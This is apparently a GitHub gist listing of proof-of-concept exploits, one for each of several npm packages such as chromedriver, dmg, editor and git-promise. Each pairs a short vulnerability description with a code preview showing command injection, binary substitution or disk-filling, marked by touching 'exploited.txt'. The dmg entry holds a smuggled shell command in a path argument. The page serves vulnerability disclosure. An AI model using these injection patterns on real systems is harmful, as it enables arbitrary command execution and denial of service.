@mcoimbra
mcoimbra / topenurl-1.1.1_poc.js
Created October 26, 2023 12:01
Package topenurl: when executing the open(url, callback) function, if there is an error reading the URL, it gets handled by a user-provided callback function without any security measure like the node:vm module.
'use strict'
const pkg = require('topenurl');
const callback = function(error) {
const fs = require('node:fs');
let fd = fs.openSync('exploited.txt', 'a');
fs.closeSync(fd);
};
mcoimbra / aaptjs_poc.js
Last active October 26, 2023 12:09
Package aaptjs: The aaptjs module's 'add' function can add files to an existing .zip file. It is possible to call it once to create a .zip file and then iteratively create a new .zip from the previous one, eventually filling the file system storage space.
'use strict'
const pkg = require('aaptjs');
/*
* Creates many zip files. After PREV_ZIP_SZ zip files created,
* it starts adding the last PREV_ZIP_SZ zip files to the new one
* rather than just the previous one.
mcoimbra / authenio-xsd-schema-validator-0.7.3_poc.js
Last active October 26, 2023 12:26
Package authenio-xsd-schema-validator: The error handling of the Validator.prototype.validateXML call is delegated to a callback function provided by the user, through which I was able to create a local 'exploit.txt' file.
'use strict'
const pkg = require('@authenio/xsd-schema-validator');
process.env.JAVA_HOME = 'touch';
const xml = '';
const schema = '';
const callback = function(err, result) {
const fs = require('node:fs');
mcoimbra / check-dependencies-1.1.0_poc.js
Created October 26, 2023 16:31
Package check-dependencies: command injection is possible through a series of argument manipulations and by writing locally to a file and directory.
'use strict'
const fs = require('node:fs');
const path = require('node:path');
const cwd = process.cwd();
/*
* Create a local 'bower.json' file so that the program flow can
* continue within the pkg.sync call below.
mcoimbra / chromedriver-115.0.1_poc.js
Created October 26, 2023 17:02
Package chromedriver: possible to do command injection by manipulating the arguments.
'use strict'
const chromedriver = require('chromedriver');
const args = ['exploited.txt'];
const returnPromise = false;
chromedriver.path = '/usr/bin/touch';
// This creates a local 'exploited.txt' file.
mcoimbra / dmg-0.1.0_poc.js
Created October 26, 2023 18:03
Package dmg: it is possible to perform command injection by manipulating the 'path' argument which supposedly would contain a valid path to a .dmg file.
'use strict'
const dmg = require('dmg');
const path = '" | touch exploited.txt | echo /Volumes/ "';
const callback = function() {};
dmg.unmount(path, callback);
mcoimbra / editor-1.0.0_poc.js
Created October 26, 2023 18:31
Package editor: the user is able to inject a binary to be executed.
'use strict'
const editor = require('editor');
const file = 'exploited.txt';
const opts = {
editor: 'touch'
};
const cb = function() {};
mcoimbra / cross-conf-env-1.3.0_poc.js
Created October 26, 2023 21:07
Package cross-conf-env: Possible to inject code in the argument of the package's exported function crossConfEnv.
'use strict'
const pkg = require('cross-conf-env');
// This will create a local 'exploit.txt' file.
pkg.default(['touch', 'exploit.txt']);
mcoimbra / cross-os-1.5.0_poc.js
Created October 26, 2023 21:24
Package cross-os: Spawn is called (#45) and it is possible to manipulate the binary and arguments passed to it via the local package.json.
'use strict'
const pkg = require('cross-os');
mcoimbra / git-promise-1.0.0_poc.js
Created October 28, 2023 15:16
Package git-promise: it is possible through the argument to execute a binary which is not 'git', with the package README.md focusing only on running git commands.
'use strict'
const pkg = require('git-promise');
const commandOrArgs = 'exploited.txt';
const optionsOrCallback = {
gitExec: 'touch'
};
const callbackMaybe = function() {};